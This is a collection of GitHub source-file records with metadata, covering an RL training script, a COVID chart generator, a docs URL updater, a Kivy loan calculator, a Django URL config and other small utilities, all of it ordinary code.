"momo007Dev/TFE-Networking_toolkit", "sub_path": "code/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 11574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "platform.system", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 66, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 99, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 110, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 110, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Warning", "line_number": 117, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 117, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 118, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 118, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 125, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 127, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 127, "usage_type": "name"}, {"api_name": "platform.python_version", "line_number": 135, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Information", "line_number": 139, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 139, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.YesRole", "line_number": 141, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 141, "usage_type": "name"}, {"api_name": "webbrowser.open", "line_number": 145, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.YesRole", "line_number": 147, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 147, "usage_type": "name"}, {"api_name": "webbrowser.open", "line_number": 151, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.RejectRole", "line_number": 153, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 153, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 181, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 181, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 182, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAbstractScrollArea", "line_number": 183, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 183, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 184, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 184, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 185, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 185, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 192, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 192, "usage_type": "name"}, {"api_name": "ipaddress.IPv4Network", "line_number": 198, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 283, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 283, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 288, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 288, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 293, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 293, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 297, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 297, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 303, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 303, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 309, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 309, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 315, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 315, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 321, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 321, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 327, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 327, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 332, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 332, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 335, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 335, "usage_type": "name"}]} +{"seq_id": "17246164625", "text": "from arguments import get_args\nargs = get_args()\nimport os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"2\"\nimport gym\nimport torch\nprint(torch.cuda.device_count())\ntorch.cuda.set_device(int(args.gpuid))\nimport gym_gvgai as gvg\nfrom stable_baselines3 import DQN, A2C, PPO\nfrom stable_baselines3.dqn.policies import DQNPolicy\n\nfrom environment.GOLOEnv import GOLOEnv\nimport sys\nimport numpy as np\nfrom networks import SingleConvExtractor, DoubleInputConvExatractor\nfrom stable_baselines3.common.policies import ActorCriticPolicy\nfrom stable_baselines3.common.env_util import make_vec_env\nfrom stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnv\n\nfrom stable_baselines3.common.evaluation import evaluate_policy\nfrom stable_baselines3.common.callbacks import CheckpointCallback, EveryNTimesteps\nnp.set_printoptions(threshold=sys.maxsize)\n\n\n\n\nif __name__ == '__main__':\n if args.use_one_hot:\n if args.use_local_observation:\n folder = \"onehot_golo/\"\n else:\n folder = \"onehot_go/\"\n else:\n if args.use_local_observation:\n folder = \"img_golo/\"\n else:\n folder = \"img_go/\"\n\n\n folder += args.env_name +\"/\"\n log_path = args.log_dir + folder\n save_path = args.save_dir + folder\n print(save_path)\n model_name = args.algo+\"_\"+args.env_name+\"_\"+\"onehot_\"+str(args.use_one_hot)+\"_lo_\"+str(args.use_local_observation)\n print(\"model name\",model_name)\n assert args.algo in [\"DQN\", \"A2C\", \"PPO\"]\n save_path = os.path.join(save_path,model_name)\n if save_path is not None:\n os.makedirs(save_path, exist_ok=True)\n checkpoint_on_event = CheckpointCallback(save_freq=1, save_path=save_path)\n event_callback = EveryNTimesteps(n_steps=100000, callback=checkpoint_on_event)\n \n\n if args.algo == \"DQN\":\n env = GOLOEnv(args.env_name, args.use_one_hot, args.use_local_observation,args.algo)\n else:\n print(args.algo)\n env = make_vec_env(\n GOLOEnv, n_envs=8, vec_env_cls=SubprocVecEnv, env_kwargs={\"game\": args.env_name, \"use_one_hot\": args.use_one_hot, \"use_LO\": args.use_local_observation,\"algorithm\":args.algo})\n if args.use_local_observation:\n extractor_cls = DoubleInputConvExatractor\n else:\n extractor_cls = SingleConvExtractor\n\n policy_kwargs = {\n \"features_extractor_class\": extractor_cls,\n \"features_extractor_kwargs\": {'one_hot': args.use_one_hot},\n 'net_arch': []\n }\n if args.algo == \"DQN\":\n agent = DQN(\n DQNPolicy, env, buffer_size=40000, verbose=1,\n learning_starts=0, policy_kwargs=policy_kwargs, tensorboard_log=log_path\n )\n elif args.algo == \"A2C\":\n agent = A2C(\n ActorCriticPolicy, env, verbose=1,\n policy_kwargs=policy_kwargs, tensorboard_log=log_path\n )\n elif args.algo == \"PPO\":\n agent = PPO(\n ActorCriticPolicy, env, verbose=1,\n policy_kwargs=policy_kwargs, tensorboard_log=log_path\n )\n print(args.total_timesteps)\n agent.save(save_path+\"/rl_model_0\")\n #default log_interval=1000\n agent.learn(total_timesteps=args.total_timesteps, callback=event_callback, log_interval=100)\n agent.save(save_path + \"final\" + args.algo)\n\n\n", "repo_name": "SUSTechGameAI/DORL", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 3261, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "arguments.get_args", "line_number": 2, "usage_type": "call"}, {"api_name": "torch.cuda.device_count", "line_number": 7, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.cuda.set_device", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.set_printoptions", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 50, "usage_type": "call"}, {"api_name": "stable_baselines3.common.callbacks.CheckpointCallback", "line_number": 51, "usage_type": "call"}, {"api_name": "stable_baselines3.common.callbacks.EveryNTimesteps", "line_number": 52, "usage_type": "call"}, {"api_name": "environment.GOLOEnv.GOLOEnv", "line_number": 56, "usage_type": "call"}, {"api_name": "stable_baselines3.common.env_util.make_vec_env", "line_number": 59, "usage_type": "call"}, {"api_name": "environment.GOLOEnv.GOLOEnv", "line_number": 60, "usage_type": "argument"}, {"api_name": "stable_baselines3.common.vec_env.SubprocVecEnv", "line_number": 60, "usage_type": "name"}, {"api_name": "networks.DoubleInputConvExatractor", "line_number": 62, "usage_type": "name"}, {"api_name": "networks.SingleConvExtractor", "line_number": 64, "usage_type": "name"}, {"api_name": "stable_baselines3.DQN", "line_number": 72, "usage_type": "call"}, {"api_name": "stable_baselines3.dqn.policies.DQNPolicy", "line_number": 73, "usage_type": "argument"}, {"api_name": "stable_baselines3.A2C", "line_number": 77, "usage_type": "call"}, {"api_name": "stable_baselines3.common.policies.ActorCriticPolicy", "line_number": 78, "usage_type": "argument"}, {"api_name": "stable_baselines3.PPO", "line_number": 82, "usage_type": "call"}, {"api_name": "stable_baselines3.common.policies.ActorCriticPolicy", "line_number": 83, "usage_type": "argument"}]} +{"seq_id": "73615337794", "text": "#!/bin/python3\n\nimport urllib.request\nimport json\nimport pygal\n\n\nsauce = 'https://raw.githubusercontent.com/pomber/covid19/master/docs/timeseries.json'\n\nfile_obj = urllib.request.urlopen(sauce)\n\n# transfrom into string\ncontent = file_obj.read()\n\n# covid_data is 'content' , now in dict format\ncovid_data = json.loads(content)\n\ncountry_list_of_tuples = []\n\n\n\n\nfor i in covid_data:\n #i would be the country name\n \n country_list = covid_data[i]\n \n # Data is ACCUMLATIVE, so last_index, confirmed key value\n # capturing today's data, or any future date\n last_index = country_list[-1]\n \n \n last_confirmed = last_index[\"confirmed\"]\n \n # creating a tuple that holds the country name, and accumlative confimred value\n # ('Syria', 19), is format\n solo_country_tuple = (i,last_confirmed)\n \n \n # appending that tuple before overwritten with other data\n country_list_of_tuples.append(solo_country_tuple)\n \n\n# sorting the tuple according to their 1st index,'comfirmed', greatest to lowest\nsorted_country_tuples = sorted(country_list_of_tuples, key=lambda c: c[1], reverse=True)\n\n\n\n#######################################################################################\n# Intention: Build a program that charts corona virus cases for the top x countries, \n# ..where x is an integer entered by user input. \n\n\nprint(\"Chart the top 'x' countries with COVID-19 cases\")\nprint('-----------------------------------------------\\n')\n\n\n# user's 'X' input -----------------------------------------\nwhile True:\n try:\n x = int(input('Enter an integer between 1 and 187: '))\n print('\\n')\n while(x<= 0 or x > 187):\n print('Your input needs to be an integer between 1 and 187.')\n print('\\n')\n x = int(input(\"Try again and enter an integer between 1 and 187: \"))\n except:\n print(\"That's not an integer...\\n\")\n else:\n break\n \n# ---------------------------------------------------------\n\n\n\n# WIDTH AND HEIGHT ASSIGNMENT ------------------------------\n# The value of x determines the width and height of the chart\n\nif(x<11):\n width = 1000\n height = 800\nelif(x >= 11 or x < 50):\n width = 1200\n height = 1000\nelif(x >= 50 or x < 101):\n width = 1400\n height = 1300\nelse:\n width = 1500\n height = 1500\n\nchart = pygal.Line(width=width,height=height)\n\n# ---------------------------------------------------------\n\n\nchart.title = \"COVID-19 CASES\"\n\n\n\n# PLOT POINTS ----------------------------------------------\n\n# will equal to the number of 'x' indexes\ntop_x_tuples = sorted_country_tuples[:x]\n\nfor i in range(x):\n \n # holds all the confirmed case values for 'x' countries\n temp_lst = [] \n \n #access the name of the country\n for j in range(len(covid_data[top_x_tuples[i][0]])): \n \n # gets ALL the confirmed values\n temp_lst.append(covid_data[top_x_tuples[i][0]][j][\"confirmed\"]) \n \n \n # make a series for the country and the temp_lst as that country's data\n chart.add(top_x_tuples[i][0],temp_lst) \n \n# ---------------------------------------------------------\n\nchart.render()\n", "repo_name": "Ericgutie0/Covid_Cases_Chart", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3013, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 10, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 10, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 10, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "pygal.Line", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "39477817443", "text": "import pathlib\nHERE = pathlib.Path(__file__).absolute().parent\n\n\ndef update_url(root: pathlib.Path, path: pathlib.Path):\n if path.name == '_index.md':\n url = f'{path.parent.relative_to(root)}/'\n else:\n url = f'{path.parent.relative_to(root)}/{path.stem}/'\n\n frontmatter = []\n lines = []\n delemeter = 0\n for l in path.read_text().split('\\n'):\n if l.startswith('---'):\n delemeter += 1\n else:\n if delemeter == 0:\n raise Exception('no frontmatter')\n elif delemeter == 1:\n frontmatter.append(l)\n elif delemeter == 2:\n lines.append(l)\n else:\n raise Exception('too many ---')\n if lines and lines[-1] == '':\n lines.pop()\n\n with path.open('w') as f:\n f.write('---\\n')\n url_found = False\n for l in frontmatter:\n if l.startswith('url:'):\n f.write(f'url: \"{url}\"\\n')\n url_found = True\n else:\n f.write(l + '\\n')\n if not url_found:\n f.write(f'url: \"{url}\"\\n')\n f.write('---\\n')\n for l in lines:\n f.write(l + '\\n')\n print(f'{url}')\n\n\ndef traverse(root: pathlib.Path, path: pathlib.Path):\n\n for f in path.iterdir():\n if f.is_dir():\n traverse(root, f)\n else:\n if f.suffix == '.md':\n update_url(root, f)\n\n\ndef process(root: pathlib.Path, child: str):\n traverse(root, root / child)\n\n\nif __name__ == '__main__':\n process(HERE.parent / 'content/ja/docs', 'univrm')\n process(HERE.parent / 'content/en/docs', 'univrm')\n", "repo_name": "vrm-c/vrm.dev", "sub_path": "scripts/auto_url.py", "file_name": "auto_url.py", "file_ext": "py", "file_size_in_byte": 1667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 29, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 2, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "10080577469", "text": "# модуль platej_kivy2.py\nfrom kivy.app import App\n\nclass Platej(App):\n\n def raschet(self, tinp_summa, tinp_proc, tinp_k_mes):\n s = int(tinp_summa)\n p = float(tinp_proc)\n n = int(tinp_k_mes)\n i = p / 12 / 100\n a = s * i / (1 - (1 / (1 + i)) ** n)\n a = round(a, 2)\n return str(a)\n\nMainApp = Platej()\nMainApp.title = \"Расчет ежемесячного аннуитентного платежа\"\n\nMainApp.run()", "repo_name": "Borisonix/kivy1", "sub_path": "rus_book/platej_kivy2.py", "file_name": "platej_kivy2.py", "file_ext": "py", "file_size_in_byte": 468, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "kivy.app.App", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "12599245990", "text": "from sqlalchemy.orm import Session\nfrom db.repository.users import \\\n retrieve_users_by_email, \\\n retrieve_users_by_login\nfrom db.models.user import User\n\n\ndef get_user_by_login_or_email(user_login_or_email: str, db: Session) -> User or None:\n user_by_email = retrieve_users_by_email(user_email=user_login_or_email, db=db)\n if len(user_by_email) == 1:\n return user_by_email[0]\n else:\n user_by_login = retrieve_users_by_login(user_login=user_login_or_email, db=db)\n if len(user_by_login) == 1:\n return user_by_login[0]\n else:\n return None\n", "repo_name": "Xzart/PoznanskaInicjatywaStrategiczna", "sub_path": "backend/db/repository/login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlalchemy.orm.Session", "line_number": 8, "usage_type": "name"}, {"api_name": "db.repository.users.retrieve_users_by_email", "line_number": 9, "usage_type": "call"}, {"api_name": "db.repository.users", "line_number": 9, "usage_type": "name"}, {"api_name": "db.repository.users.retrieve_users_by_login", "line_number": 13, "usage_type": "call"}, {"api_name": "db.repository.users", "line_number": 13, "usage_type": "name"}, {"api_name": "db.models.user.User", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "27641739564", "text": "import os\nimport re\nimport sys\nimport numpy\nimport matplotlib.pyplot as pyplot\n\ngenerations = []\naverage_results = []\nmax_results = []\nmin_results = []\n\nexperiment_number = 1\n\nif len(sys.argv) >= 2:\n experiment_number = sys.argv[1]\nelse:\n print(\"Which experiment do you want me to plot? (1/2/3 etc)\")\n experiment_number = input()\n\ntake = False\nif len(sys.argv) >= 3:\n take = int(sys.argv[2])\n\nworking_directory = os.getcwd() + \"\\\\experiment\" + experiment_number;\nroute = os.listdir(working_directory);\nroute.sort()\nfor directory in route:\n if not os.path.isdir(working_directory + \"\\\\\" + directory):\n continue\n generation_number = re.findall(\"(\\\\d+)\", directory)\n generations.append(int(generation_number[0]))\n file = open(working_directory + \"/\" + directory + \"/summary.txt\")\n lines = str.join(\"\", file.readlines())\n compiled = re.compile(\"Average: (-?\\d*\\.\\d*)\")\n average_results.append(float(compiled.findall(lines)[0]))\n compiled = re.compile(\"Max: (-?\\d+) - player: \\d+\")\n max_results.append(float(compiled.findall(lines)[0]))\n compiled = re.compile(\"Min: (-?\\d+) - player: \\d+\")\n min_results.append(float(compiled.findall(lines)[0]))\n\ngenerations, average_results, max_results, min_results = zip(*sorted(zip(generations, average_results, max_results, min_results)))\n\nif take:\n generations, average_results, max_results, min_results = generations[:take], average_results[:take], max_results[:take], min_results[:take]\n\npyplot.subplot(211)\naverage_plot, = pyplot.plot(generations, average_results, label=\"Average\")\nmin_plot, = pyplot.plot(generations, min_results, label=\"Min\")\npyplot.xlabel(\"generation\")\npyplot.ylabel(\"fitness\")\n\npyplot.legend(handles=[average_plot, min_plot])\n\npyplot.subplot(212)\npyplot.xlabel(\"generation\")\npyplot.ylabel(\"fitness\")\nmax_plot, = pyplot.plot(generations, max_results, label=\"Max\")\npyplot.legend(handles=[max_plot])\n\npyplot.setp(min_plot, linewidth=0.2)\npyplot.setp(max_plot, linewidth=0.2)\npyplot.setp(average_plot, linewidth=0.2)\n\npyplot.show()", "repo_name": "cohen990/evolution-of-tetris", "sub_path": "plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 2014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 34, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]} +{"seq_id": "71965188994", "text": "import re, os, sys\nfrom .utils import _is_property, _is_method\n\ndef _try_eval(s):\n try:\n s = eval(s)\n except:\n pass\n return s\nclass _Base(type):\n def __getattr__(self, name):\n return ''\n\nclass Base(metaclass=_Base):\n _cls = 'Config'\n def __getattr__(self, name):\n return ''\n\n # dict-like interface\n def __getitem__(self, key):\n return getattr(self, key)\n def __setitem__(self, key, item):\n setattr(self, key, item)\n\n def __init__(self, cfg=None, parse=False):\n if cfg:\n self.update(cfg, exclude=[])\n if parse:\n self.parse()\n\n def update(self, cfg, key=None, exclude=['name', 'idx_name']):\n if key != None: # store cfg as a sub-config\n setattr(self, key, Base(cfg))\n elif isinstance(cfg, str): # path / dict in str\n if os.path.isfile(cfg) and cfg.endswith('yaml'):\n import yaml\n with open(cfg) as f:\n cfg = dict(yaml.load(f, Loader=yaml.FullLoader))\n elif cfg.startswith('{') and cfg.endswith('}'):\n cfg = eval(cfg)\n else:\n cfg = dict([[i.strip() for i in t.split(':')] for t in cfg.split(',')])\n cfg = {_try_eval(k): _try_eval(v) for k, v in cfg.items()}\n self.update(cfg, exclude=exclude)\n elif isinstance(cfg, dict): # update from dict\n for k, v in cfg.items():\n if k in exclude:\n pass\n elif _is_property(self, k) or _is_method(getattr(self, k)):\n # print(f'{k} is a property / method in {self}', file=sys.stderr)\n try:\n setattr(self, k, v)\n except:\n raise KeyError(f'{k} is a property / method in {self}')\n elif isinstance(v, dict): # nesting dict\n if hasattr(self, k) and isinstance(getattr(self, k), dict): # replace the dict (if it exists & is indeed a dict)\n setattr(self, k, v)\n elif hasattr(self, k) and isinstance(getattr(self, k), Base): # update the sub-config\n getattr(self, k).update(v, exclude=exclude)\n else: # extend to be a sub-config\n self.update(v, key=k, exclude=exclude)\n else:\n setattr(self, k, v)\n else: # update from another cfg\n for attr in [i for i in dir(cfg) if not i.startswith('_') and i not in self._attr_dict]:\n if not _is_property(self, attr) and not _is_method(getattr(cfg, attr)) and attr not in exclude:\n setattr(self, attr, getattr(cfg, attr))\n def parse(self):\n pass\n\n def freeze(self):\n cfg = Base()\n cfg.update(self, exclude=[]) # turn all property into frozen args\n return cfg\n\nclass Config(Base):\n\n # ---------------------------------------------------------------------------- #\n # project-wise setting\n # ---------------------------------------------------------------------------- #\n data_path = 'Data'\n saving_path = None\n saving = True # save model snap\n save_val = '' # keys to save\n save_test = False # save model inference results after trained\n snap_dir = 'snapshots'\n snap_prefix = 'snap'\n # summary_dir = '' # use saving_path - assume single train per saving_path\n max_to_keep = 100\n mode = 'train'\n\n rand_seed = 0\n distribute = 'tf_device'\n colocate_gradients_with_ops = False\n\n grad_raise_none = True\n\n @property\n def gpu_devices(self):\n if isinstance(self.gpus, int) or self.gpus.isdigit():\n cuda_dev = [str(i) for i in range(int(self.gpus))]\n else:\n assert ',' in self.gpus, f'unexpected cfg.gpus = {self.gpus}'\n cuda_dev = [i.strip() for i in self.gpus.split(',') if i.strip()]\n cuda_dev = ','.join(cuda_dev)\n return cuda_dev\n @property\n def gpu_num(self):\n # NOTE: gpu_num=1 when gpus=0, as gpu_devices='' => gpu_devices.split(',')=['']\n # => check if gpu available by gpu_devices == ''\n return len(self.gpu_devices.split(','))\n @property\n def _num_layers(self):\n # Number of layers - downsample_stage, each stage = [downsample ops, ops, ...]\n is_down_stage = lambda blk: any([k in blk for k in ['pool', 'strided']])\n return len([block for block in self.architecture if is_down_stage(block)]) + 1\n @property\n def idx_name_pre(self): return type(self).__name__.lower()\n\n def __init__(self, cfg=None, parse=True):\n super(Config, self).__init__(cfg, parse)\n if parse:\n self.parse()\n\n def parse(self):\n if self.architecture:\n assert self.num_layers == self._num_layers, f'claim as {self.num_layers}, but calc to be {self._num_layers}'\n\n if not self.architecture_dims:\n # d_out - output dims of each stage (first_features_dim = d_in of stage 0)\n self.architecture_dims = [self.first_features_dim * (2 ** i) for i in range(1, self.num_layers + 1)]\n # self.architecture_cfg = super(Config, self).parse() # parse config\n", "repo_name": "LiyaoTang/contrastBoundary", "sub_path": "tensorflow/config/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 5254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 117, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.isfile", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 38, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 38, "usage_type": "attribute"}, {"api_name": "utils._is_property", "line_number": 49, "usage_type": "call"}, {"api_name": "utils._is_method", "line_number": 49, "usage_type": "call"}, {"api_name": "utils._is_property", "line_number": 66, "usage_type": "call"}, {"api_name": "utils._is_method", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "6981296783", "text": "from django.urls import path\n\nfrom . import views\napp_name = 'icon'\n\nurlpatterns = [\n path('icons/', views.ViewIcon.as_view(), name='icons'),\n path('icons//', views.DetailIcon.as_view(), name='icon'),\n path('delete_review_icon//', views.delete_review, name='delete-review'),\n path('icon_like/', views.like, name='add_like'),\n path('api/v1/', views.IconDetailView.as_view()),\n path('api/v2/', views.IconCreateView.as_view()),\n]\n", "repo_name": "Ioann55007/The-Artist", "sub_path": "icons/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "22995689864", "text": "\nimport torch\n\n\ndef compute_distortion(points, faces, param):\n\n triangles = points[faces]\n triangles = triangles - triangles[:, -1].unsqueeze(1)\n triangles = triangles[:, :-1].transpose(1,2)\n\n U, _, _ = torch.svd(triangles, compute_uv=True)\n P = 